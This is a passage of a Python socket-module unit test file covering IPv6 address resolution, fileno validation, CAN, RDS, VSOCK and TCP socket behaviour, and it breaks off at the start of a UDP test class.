@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
    """IPv6 sockaddr flowinfo values outside the valid range must
    raise OverflowError in getnameinfo() and bind()."""
    self.assertRaises(OverflowError, socket.getnameinfo,
                      (support.HOSTv6, 0, 0xffffffff), 0)
    with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
        self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
    """getaddrinfo() must normalize an IPv6 literal to lowercase in
    the returned sockaddr."""
    ((*_, sockaddr),) = socket.getaddrinfo(
        'ff02::1de:c0:face:8D',  # Note capital letter `D`.
        1234, socket.AF_INET6,
        socket.SOCK_DGRAM,
        socket.IPPROTO_UDP
    )
    self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
    """getaddrinfo() must translate a symbolic '%iface' scope suffix
    into the interface's numeric index in the sockaddr."""
    # Just pick up any network interface (Linux, Mac OS X)
    (ifindex, test_interface) = socket.if_nameindex()[0]
    ((*_, sockaddr),) = socket.getaddrinfo(
        'ff02::1de:c0:face:8D%' + test_interface,
        1234, socket.AF_INET6,
        socket.SOCK_DGRAM,
        socket.IPPROTO_UDP
    )
    # Note missing interface name part in IPv6 address
    self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
    sys.platform == 'win32',
    'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
    """getaddrinfo() must accept a numeric '%N' scope suffix and carry
    it through as the sockaddr's scope id."""
    # Also works on Linux and Mac OS X, but is not documented (?)
    # Windows, Linux and Max OS X allow nonexistent interface numbers here.
    ifindex = 42
    ((*_, sockaddr),) = socket.getaddrinfo(
        'ff02::1de:c0:face:8D%' + str(ifindex),
        1234, socket.AF_INET6,
        socket.SOCK_DGRAM,
        socket.IPPROTO_UDP
    )
    # Note missing interface name part in IPv6 address
    self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
    """getnameinfo() must render a numeric scope id back as the
    symbolic '%iface' suffix."""
    # Just pick up any network interface.
    (ifindex, test_interface) = socket.if_nameindex()[0]
    sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex)  # Note capital letter `D`.
    nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
    self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
    'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
    """getnameinfo() must render the scope id numerically as '%N' on
    platforms without symbolic scope support."""
    # Also works on Linux (undocumented), but does not work on Mac OS X
    # Windows and Linux allow nonexistent interface numbers here.
    ifindex = 42
    sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex)  # Note capital letter `D`.
    nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
    self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
    """The AF_* and SOCK_* socket attributes must stringify with
    enum-style reprs."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        checks = ((s.family, 'AddressFamily.AF_INET'),
                  (s.type, 'SocketKind.SOCK_STREAM'))
        for attr, expected in checks:
            self.assertEqual(str(attr), expected)
def test_socket_consistent_sock_type(self):
    """The .type attribute must stay SOCK_STREAM (flags like
    SOCK_NONBLOCK/SOCK_CLOEXEC masked out) regardless of blocking or
    timeout changes."""
    SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
    SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
    sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
    with socket.socket(socket.AF_INET, sock_type) as s:
        self.assertEqual(s.type, socket.SOCK_STREAM)
        s.settimeout(1)
        self.assertEqual(s.type, socket.SOCK_STREAM)
        s.settimeout(0)
        self.assertEqual(s.type, socket.SOCK_STREAM)
        s.setblocking(True)
        self.assertEqual(s.type, socket.SOCK_STREAM)
        s.setblocking(False)
        self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
    """.family/.type must fall back to the raw number when the socket
    was created with values outside the known AF_*/SOCK_* enums."""
    # Test that when created with a family that's not one of the known
    # AF_*/SOCK_* constants, socket.family just returns the number.
    #
    # To do this we fool socket.socket into believing it already has an
    # open fd because on this path it doesn't actually verify the family and
    # type and populates the socket object.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    fd = sock.detach()
    unknown_family = max(socket.AddressFamily.__members__.values()) + 1

    unknown_type = max(
        kind
        for name, kind in socket.SocketKind.__members__.items()
        if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
    ) + 1

    with socket.socket(
            family=unknown_family, type=unknown_type, proto=23,
            fileno=fd) as s:
        self.assertEqual(s.family, unknown_family)
        self.assertEqual(s.type, unknown_type)
        # some OS like macOS ignore proto
        self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
    """_sendfile_use_sendfile() must give up cleanly on a closed fd,
    and reject non-int / overflowing fileno() results."""
    # Minimal stand-in exposing only fileno(), as sendfile requires.
    class File:
        def __init__(self, fd):
            self.fd = fd

        def fileno(self):
            return self.fd
    with socket.socket() as sock:
        fd = os.open(os.curdir, os.O_RDONLY)
        os.close(fd)
        # fd is now stale: sendfile must signal fallback, not crash.
        with self.assertRaises(socket._GiveupOnSendfile):
            sock._sendfile_use_sendfile(File(fd))
        with self.assertRaises(OverflowError):
            sock._sendfile_use_sendfile(File(2**1000))
        with self.assertRaises(TypeError):
            sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
    """Helper: a socket rebuilt from s.fileno() must report the same
    family, type and fd as the original."""
    self.assertEqual(s.family, family)
    self.assertEqual(s.type, stype)

    fd = s.fileno()
    s2 = socket.socket(fileno=fd)
    self.addCleanup(s2.close)
    # detach old fd to avoid double close
    s.detach()
    self.assertEqual(s2.family, family)
    self.assertEqual(s2.type, stype)
    self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
    """socket(fileno=...) must rebuild an equivalent socket for TCP,
    UDP, IPv6 and (where available) AF_UNIX sockets."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.addCleanup(s.close)
    s.bind((support.HOST, 0))
    self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)

    if hasattr(socket, "SOCK_DGRAM"):
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.addCleanup(s.close)
        s.bind((support.HOST, 0))
        self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)

    if support.IPV6_ENABLED:
        s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
        self.addCleanup(s.close)
        s.bind((support.HOSTv6, 0, 0, 0))
        self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)

    if hasattr(socket, "AF_UNIX"):
        tmpdir = tempfile.mkdtemp()
        self.addCleanup(shutil.rmtree, tmpdir)
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.addCleanup(s.close)
        try:
            s.bind(os.path.join(tmpdir, 'socket'))
        except PermissionError:
            # Some environments forbid creating unix sockets here.
            pass
        else:
            self._test_socket_fileno(s, socket.AF_UNIX,
                                     socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
    """socket(fileno=...) must reject a float fd with TypeError."""
    with self.assertRaisesRegex(TypeError, "integer argument expected"):
        socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
    """socket(fileno=...) must reject a non-numeric fd with TypeError."""
    with self.assertRaisesRegex(TypeError, "integer is required"):
        socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
    """socket(fileno=-1) must raise ValueError on every platform."""
    with self.assertRaisesRegex(ValueError, "negative file descriptor"):
        socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
    """socket(fileno=<negative>) must raise ValueError (non-Windows;
    Windows only special-cases -1)."""
    with self.assertRaisesRegex(ValueError, "negative file descriptor"):
        socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
    """socket(fileno=...) must raise OSError (EBADF, or WSAENOTSOCK on
    Windows) for a bad descriptor, with and without family/type."""
    WSAENOTSOCK = 10038
    with self.assertRaises(OSError) as cm:
        socket.socket(fileno=support.make_bad_fd())
    self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))

    with self.assertRaises(OSError) as cm:
        socket.socket(
            socket.AF_INET,
            socket.SOCK_STREAM,
            fileno=support.make_bad_fd())
    self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
    """socket(fileno=...) must reject a descriptor that is open but
    not a socket (ENOTSOCK)."""
    with tempfile.NamedTemporaryFile() as afile:
        with self.assertRaises(OSError):
            socket.socket(fileno=afile.fileno())

        with self.assertRaises(OSError) as cm:
            socket.socket(
                socket.AF_INET,
                socket.SOCK_STREAM,
                fileno=afile.fileno())
        self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
    """Basic SocketCAN coverage: constants exist, raw/BCM sockets can
    be created, and bind/sockopt behave as documented."""

    def testCrucialConstants(self):
        """The core CAN constants must be present."""
        socket.AF_CAN
        socket.PF_CAN
        socket.CAN_RAW

    @unittest.skipUnless(hasattr(socket, "CAN_BCM"),
                         'socket.CAN_BCM required for this test.')
    def testBCMConstants(self):
        """All broadcast-manager opcodes and flags must be present."""
        socket.CAN_BCM

        # opcodes
        socket.CAN_BCM_TX_SETUP     # create (cyclic) transmission task
        socket.CAN_BCM_TX_DELETE    # remove (cyclic) transmission task
        socket.CAN_BCM_TX_READ      # read properties of (cyclic) transmission task
        socket.CAN_BCM_TX_SEND      # send one CAN frame
        socket.CAN_BCM_RX_SETUP     # create RX content filter subscription
        socket.CAN_BCM_RX_DELETE    # remove RX content filter subscription
        socket.CAN_BCM_RX_READ      # read properties of RX content filter subscription
        socket.CAN_BCM_TX_STATUS    # reply to TX_READ request
        socket.CAN_BCM_TX_EXPIRED   # notification on performed transmissions (count=0)
        socket.CAN_BCM_RX_STATUS    # reply to RX_READ request
        socket.CAN_BCM_RX_TIMEOUT   # cyclic message is absent
        socket.CAN_BCM_RX_CHANGED   # updated CAN frame (detected content change)

        # flags
        socket.CAN_BCM_SETTIMER
        socket.CAN_BCM_STARTTIMER
        socket.CAN_BCM_TX_COUNTEVT
        socket.CAN_BCM_TX_ANNOUNCE
        socket.CAN_BCM_TX_CP_CAN_ID
        socket.CAN_BCM_RX_FILTER_ID
        socket.CAN_BCM_RX_CHECK_DLC
        socket.CAN_BCM_RX_NO_AUTOTIMER
        socket.CAN_BCM_RX_ANNOUNCE_RESUME
        socket.CAN_BCM_TX_RESET_MULTI_IDX
        socket.CAN_BCM_RX_RTR_FRAME

    def testCreateSocket(self):
        """A raw CAN socket can be opened and closed."""
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            pass

    @unittest.skipUnless(hasattr(socket, "CAN_BCM"),
                         'socket.CAN_BCM required for this test.')
    def testCreateBCMSocket(self):
        """A broadcast-manager CAN socket can be opened and closed."""
        with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
            pass

    def testBindAny(self):
        """Binding to the empty interface name means "any interface"."""
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            address = ('', )
            s.bind(address)
            self.assertEqual(s.getsockname(), address)

    def testTooLongInterfaceName(self):
        """bind() must reject an interface name longer than IFNAMSIZ."""
        # most systems limit IFNAMSIZ to 16, take 1024 to be sure
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            self.assertRaisesRegex(OSError, 'interface name too long',
                                   s.bind, ('x' * 1024,))

    @unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
                         'socket.CAN_RAW_LOOPBACK required for this test.')
    def testLoopback(self):
        """CAN_RAW_LOOPBACK must be settable and readable (0 and 1)."""
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            for loopback in (0, 1):
                s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
                             loopback)
                self.assertEqual(loopback,
                    s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))

    @unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
                         'socket.CAN_RAW_FILTER required for this test.')
    def testFilter(self):
        """A packed (can_id, can_mask) filter must round-trip through
        set/getsockopt, and bytearray input must be accepted."""
        can_id, can_mask = 0x200, 0x700
        can_filter = struct.pack("=II", can_id, can_mask)
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
            self.assertEqual(can_filter,
                    s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
            s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
    """Two-sided SocketCAN tests: each testX method runs server-side
    while its _testX counterpart runs concurrently client-side."""

    def __init__(self, methodName='runTest'):
        ThreadedCANSocketTest.__init__(self, methodName=methodName)

    @classmethod
    def build_can_frame(cls, can_id, data):
        """Build a CAN frame."""
        # Payload is zero-padded to the fixed 8-byte frame data field.
        can_dlc = len(data)
        data = data.ljust(8, b'\x00')
        return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)

    @classmethod
    def dissect_can_frame(cls, frame):
        """Dissect a CAN frame."""
        # Only the first can_dlc bytes of the data field are payload.
        can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
        return (can_id, can_dlc, data[:can_dlc])

    def testSendFrame(self):
        """Server side: the received frame and address must match."""
        cf, addr = self.s.recvfrom(self.bufsize)
        self.assertEqual(self.cf, cf)
        self.assertEqual(addr[0], self.interface)
        self.assertEqual(addr[1], socket.AF_CAN)

    def _testSendFrame(self):
        """Client side: send a 5-byte frame."""
        self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
        self.cli.send(self.cf)

    def testSendMaxFrame(self):
        """Server side: receive a maximum-length (8-byte) frame."""
        cf, addr = self.s.recvfrom(self.bufsize)
        self.assertEqual(self.cf, cf)

    def _testSendMaxFrame(self):
        """Client side: send an 8-byte frame."""
        self.cf = self.build_can_frame(0x00, b'\x07' * 8)
        self.cli.send(self.cf)

    def testSendMultiFrames(self):
        """Server side: two frames must arrive in send order."""
        cf, addr = self.s.recvfrom(self.bufsize)
        self.assertEqual(self.cf1, cf)

        cf, addr = self.s.recvfrom(self.bufsize)
        self.assertEqual(self.cf2, cf)

    def _testSendMultiFrames(self):
        """Client side: send two distinct frames."""
        self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
        self.cli.send(self.cf1)

        self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
        self.cli.send(self.cf2)

    @unittest.skipUnless(hasattr(socket, "CAN_BCM"),
                         'socket.CAN_BCM required for this test.')
    def _testBCM(self):
        """Client side: receive the frame echoed by the BCM and check
        its id and payload."""
        cf, addr = self.cli.recvfrom(self.bufsize)
        self.assertEqual(self.cf, cf)
        can_id, can_dlc, data = self.dissect_can_frame(cf)
        self.assertEqual(self.can_id, can_id)
        self.assertEqual(self.data, data)

    @unittest.skipUnless(hasattr(socket, "CAN_BCM"),
                         'socket.CAN_BCM required for this test.')
    def testBCM(self):
        """Server side: submit a TX_SEND job (bcm_msg_head + one frame)
        to a broadcast-manager socket."""
        bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
        self.addCleanup(bcm.close)
        bcm.connect((self.interface,))
        self.can_id = 0x123
        self.data = bytes([0xc0, 0xff, 0xee])
        self.cf = self.build_can_frame(self.can_id, self.data)
        opcode = socket.CAN_BCM_TX_SEND
        flags = 0
        count = 0
        ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
        bcm_can_id = 0x0222
        nframes = 1
        assert len(self.cf) == 16
        header = struct.pack(self.bcm_cmd_msg_fmt,
                             opcode,
                             flags,
                             count,
                             ival1_seconds,
                             ival1_usec,
                             ival2_seconds,
                             ival2_usec,
                             bcm_can_id,
                             nframes,
                             )
        header_plus_frame = header + self.cf
        bytes_sent = bcm.send(header_plus_frame)
        self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
    """Basic CAN ISO-TP coverage: constants, socket creation, and bind
    against the `vcan0` virtual interface."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Virtual CAN interface expected to exist on the test machine.
        self.interface = "vcan0"

    def testCrucialConstants(self):
        """The ISO-TP related constants must be present."""
        socket.AF_CAN
        socket.PF_CAN
        socket.CAN_ISOTP
        socket.SOCK_DGRAM

    def testCreateSocket(self):
        """A raw CAN socket can be opened and closed.

        NOTE(review): this opens CAN_RAW, not CAN_ISOTP — presumably
        inherited from BasicCANTest; verify against upstream intent.
        """
        with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
            pass

    @unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
                         'socket.CAN_ISOTP required for this test.')
    def testCreateISOTPSocket(self):
        """An ISO-TP CAN socket can be opened and closed."""
        with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
            pass

    def testTooLongInterfaceName(self):
        """bind() must reject an interface name longer than IFNAMSIZ."""
        # most systems limit IFNAMSIZ to 16, take 1024 to be sure
        with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
            with self.assertRaisesRegex(OSError, 'interface name too long'):
                s.bind(('x' * 1024, 1, 2))

    def testBind(self):
        """bind() with (interface, rx_addr, tx_addr) must round-trip
        through getsockname(); skip when the interface is missing."""
        try:
            with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
                addr = self.interface, 0x123, 0x456
                s.bind(addr)
                self.assertEqual(s.getsockname(), addr)
        except OSError as e:
            if e.errno == errno.ENODEV:
                self.skipTest('network interface `%s` does not exist' %
                              self.interface)
            else:
                raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
    """Basic RDS coverage: constants, socket creation, buffer sizing."""

    def testCrucialConstants(self):
        """The RDS address-family constants must be present."""
        socket.AF_RDS
        socket.PF_RDS

    def testCreateSocket(self):
        """An RDS SEQPACKET socket can be opened and closed."""
        with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
            pass

    def testSocketBufferSize(self):
        """SO_RCVBUF/SO_SNDBUF must be settable on an RDS socket."""
        bufsize = 16384
        with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
            s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
    """Two-sided RDS tests: each testX method runs server-side while
    its _testX counterpart runs concurrently client-side."""

    def __init__(self, methodName='runTest'):
        ThreadedRDSSocketTest.__init__(self, methodName=methodName)

    def setUp(self):
        super().setUp()
        self.evt = threading.Event()

    def testSendAndRecv(self):
        """Server side: data and sender address must match."""
        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data, data)
        self.assertEqual(self.cli_addr, addr)

    def _testSendAndRecv(self):
        """Client side: send one datagram."""
        self.data = b'spam'
        self.cli.sendto(self.data, 0, (HOST, self.port))

    def testPeek(self):
        """Server side: MSG_PEEK must leave the datagram readable."""
        data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
        self.assertEqual(self.data, data)
        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data, data)

    def _testPeek(self):
        """Client side: send one datagram for the peek test."""
        self.data = b'spam'
        self.cli.sendto(self.data, 0, (HOST, self.port))

    @requireAttrs(socket.socket, 'recvmsg')
    def testSendAndRecvMsg(self):
        """Server side: recvmsg() must deliver the sendmsg() payload."""
        data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
        self.assertEqual(self.data, data)

    @requireAttrs(socket.socket, 'sendmsg')
    def _testSendAndRecvMsg(self):
        """Client side: send one message via sendmsg()."""
        self.data = b'hello ' * 10
        self.cli.sendmsg([self.data], (), 0, (HOST, self.port))

    def testSendAndRecvMulti(self):
        """Server side: two datagrams must arrive in send order."""
        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data1, data)

        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data2, data)

    def _testSendAndRecvMulti(self):
        """Client side: send two distinct datagrams."""
        self.data1 = b'bacon'
        self.cli.sendto(self.data1, 0, (HOST, self.port))

        self.data2 = b'egg'
        self.cli.sendto(self.data2, 0, (HOST, self.port))

    def testSelect(self):
        """Server side: select() must report the socket readable and
        the datagram must then be receivable."""
        r, w, x = select.select([self.serv], [], [], 3.0)
        self.assertIn(self.serv, r)
        data, addr = self.serv.recvfrom(self.bufsize)
        self.assertEqual(self.data, data)

    def _testSelect(self):
        """Client side: send one datagram for the select test."""
        self.data = b'select'
        self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
                     'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
    """Creation and bind behaviour for AF_QIPCRTR datagram sockets."""

    def testCrucialConstants(self):
        # Referencing the constant checks that the module exports it.
        socket.AF_QIPCRTR

    def testCreateSocket(self):
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as sock:
            pass

    def testUnbound(self):
        # A freshly created socket has no port assigned yet.
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as sock:
            self.assertEqual(sock.getsockname()[1], 0)

    def testBindSock(self):
        # Binding via the test-support helper must pick a non-zero port.
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as sock:
            support.bind_port(sock, host=sock.getsockname()[0])
            self.assertNotEqual(sock.getsockname()[1], 0)

    def testInvalidBindSock(self):
        # A bogus node id must be rejected with OSError.
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as sock:
            self.assertRaises(OSError, support.bind_port, sock, host=-2)

    def testAutoBindSock(self):
        # connect() implicitly binds the socket to some non-zero port.
        with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as sock:
            sock.connect((123, 123))
            self.assertNotEqual(sock.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
                     'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
    """Constant and socket-option checks for the AF_VSOCK family."""

    def testCrucialConstants(self):
        socket.AF_VSOCK

    def testVSOCKConstants(self):
        # Referencing each name verifies that the module exports it.
        socket.SO_VM_SOCKETS_BUFFER_SIZE
        socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
        socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
        socket.VMADDR_CID_ANY
        socket.VMADDR_PORT_ANY
        socket.VMADDR_CID_HOST
        socket.VM_SOCKETS_INVALID_VERSION
        socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID

    def testCreateSocket(self):
        with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
            pass

    def testSocketBufferSize(self):
        # Doubling each VM-sockets buffer option must round-trip through
        # setsockopt()/getsockopt().  The option order (MAX, SIZE, MIN)
        # matches the original test and is preserved for every pass.
        options = (socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE,
                   socket.SO_VM_SOCKETS_BUFFER_SIZE,
                   socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
        with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
            originals = [s.getsockopt(socket.AF_VSOCK, opt)
                         for opt in options]
            for opt, value in zip(options, originals):
                s.setsockopt(socket.AF_VSOCK, opt, value * 2)
            for opt, value in zip(options, originals):
                self.assertEqual(value * 2,
                                 s.getsockopt(socket.AF_VSOCK, opt))
class BasicTCPTest(SocketConnectedTest):
    # Core TCP tests over a connected socket pair: testFoo() runs
    # against the server-side connection (cli_conn) while _testFoo()
    # drives the client side (serv_conn) from the other thread.

    def __init__(self, methodName='runTest'):
        SocketConnectedTest.__init__(self, methodName=methodName)

    def testRecv(self):
        # Testing large receive over TCP
        msg = self.cli_conn.recv(1024)
        self.assertEqual(msg, MSG)

    def _testRecv(self):
        self.serv_conn.send(MSG)

    def testOverFlowRecv(self):
        # Testing receive in chunks over TCP
        seg1 = self.cli_conn.recv(len(MSG) - 3)
        seg2 = self.cli_conn.recv(1024)
        msg = seg1 + seg2
        self.assertEqual(msg, MSG)

    def _testOverFlowRecv(self):
        self.serv_conn.send(MSG)

    def testRecvFrom(self):
        # Testing large recvfrom() over TCP
        msg, addr = self.cli_conn.recvfrom(1024)
        self.assertEqual(msg, MSG)

    def _testRecvFrom(self):
        self.serv_conn.send(MSG)

    def testOverFlowRecvFrom(self):
        # Testing recvfrom() in chunks over TCP
        seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
        seg2, addr = self.cli_conn.recvfrom(1024)
        msg = seg1 + seg2
        self.assertEqual(msg, MSG)

    def _testOverFlowRecvFrom(self):
        self.serv_conn.send(MSG)

    def testSendAll(self):
        # Testing sendall() with a 2048 byte string over TCP
        msg = b''
        while 1:
            read = self.cli_conn.recv(1024)
            if not read:
                break
            msg += read
        self.assertEqual(msg, b'f' * 2048)

    def _testSendAll(self):
        big_chunk = b'f' * 2048
        self.serv_conn.sendall(big_chunk)

    def testFromFd(self):
        # Testing fromfd(): a socket rebuilt from a raw fd must still
        # receive the pending data.
        fd = self.cli_conn.fileno()
        sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
        self.addCleanup(sock.close)
        self.assertIsInstance(sock, socket.socket)
        msg = sock.recv(1024)
        self.assertEqual(msg, MSG)

    def _testFromFd(self):
        self.serv_conn.send(MSG)

    def testDup(self):
        # Testing dup(): the duplicate shares the underlying connection.
        sock = self.cli_conn.dup()
        self.addCleanup(sock.close)
        msg = sock.recv(1024)
        self.assertEqual(msg, MSG)

    def _testDup(self):
        self.serv_conn.send(MSG)

    def testShutdown(self):
        # Testing shutdown()
        msg = self.cli_conn.recv(1024)
        self.assertEqual(msg, MSG)
        # wait for _testShutdown to finish: on OS X, when the server
        # closes the connection the client also becomes disconnected,
        # and the client's shutdown call will fail. (Issue #4397.)
        self.done.wait()

    def _testShutdown(self):
        self.serv_conn.send(MSG)
        self.serv_conn.shutdown(2)

    # Reuse testShutdown as the server half of the overflow variant
    # below; only the client-side partner differs.
    testShutdown_overflow = support.cpython_only(testShutdown)

    @support.cpython_only
    def _testShutdown_overflow(self):
        import _testcapi
        self.serv_conn.send(MSG)
        # Issue 15989
        self.assertRaises(OverflowError, self.serv_conn.shutdown,
                          _testcapi.INT_MAX + 1)
        self.assertRaises(OverflowError, self.serv_conn.shutdown,
                          2 + (_testcapi.UINT_MAX + 1))
        self.serv_conn.shutdown(2)

    def testDetach(self):
        # Testing detach()
        fileno = self.cli_conn.fileno()
        f = self.cli_conn.detach()
        self.assertEqual(f, fileno)
        # cli_conn cannot be used anymore...
        self.assertTrue(self.cli_conn._closed)
        self.assertRaises(OSError, self.cli_conn.recv, 1024)
        self.cli_conn.close()
        # ...but we can create another socket using the (still open)
        # file descriptor
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
        self.addCleanup(sock.close)
        msg = sock.recv(1024)
        self.assertEqual(msg, MSG)

    def _testDetach(self):
        self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
    # Paired client/server datagram tests over UDP: testFoo() receives
    # on the server socket while _testFoo() sends from the client thread.

    def __init__(self, methodName='runTest'):
